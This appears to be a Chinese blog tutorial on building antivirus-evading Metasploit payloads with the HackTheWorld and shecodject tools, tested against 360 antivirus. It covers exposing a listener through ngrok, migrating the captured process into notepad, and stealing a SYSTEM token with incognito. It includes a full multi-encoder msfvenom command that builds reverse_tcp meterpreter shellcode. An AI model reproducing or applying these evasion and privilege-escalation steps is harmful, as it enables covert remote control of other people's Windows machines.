1、HackTheWorld
Git:https://github.com/stormshadow07/HackTheWorld
安装环境python2,相关依赖环境。
生成一个msf免杀payload:
首先设置payload类型:
其中LHOST可以使用ngrok内网映射工具,将本地kali反射到公网。
LPORT是通过ngrok进行反射时分配的端口。
实验过程中TCP类型的Payload被360查杀,https类型未被查杀。
之后就是输入密钥等等。
开启msf的监听模块:
运行程序之后,未触发360,成功获取session:
原进程在火绒剑中属于异常进程,获取session之后首先进行进程迁移:
迁移到notepad进程。
权限提升:
通过令牌窃取提升权限:
首先是低权用户,直接getsystem失败:
导入incognito模块:
列出可用令牌:
窃取system令牌:
注意添加双引号和两个反斜杠
成功获取SYSTEM权限:
第二款工具:shecodject
Git地址:https://github.com/TaroballzChen/shecodject
安装环境说明:2020版kali安装过程使用root权限安装,工具通过docker进行打包,会使用到docker镜像,安装完成之后最好将docker源换成国内源。
1、通过mpr方式生成免杀shellcode
执行run命令,会生成shellcode的临时文件:
之后back回到系统命令,然后输入exe对之前生成的临时文件进行打包:
此处设置noconsole的值会影响360的查杀,有控制台是360不能查杀,无console时会被查杀。
之后run既可以。
Noconsole被查杀
存在concole的没有被查杀:
并且成功获取session
2、
首先生成pem证书:
合并rsaprivate.key和servercertifcate.crt为pem文件:
使用msfvenom生成原始的shellcode:
这里使用多次编码生成原始文件:
命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.135.139 Lport=4444 --platform windows -a x86 HandlerSSLCert=./my.pem StagerVerifySSLCert=true -s 42 --smallest -e x86/shikata_ga_nai -i 9 -f raw | msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom --platform windows -a x86 -e x86/call4_dword_xor -i 6 -b "\x00\x0a\x0d" -f raw > ./shellcode.raw
利用shecodject进行免杀:
使用scc模块,将raw生成tmp文件:
然后利用exe模块进行打包:
有console的状态免杀:
测试无console,免杀: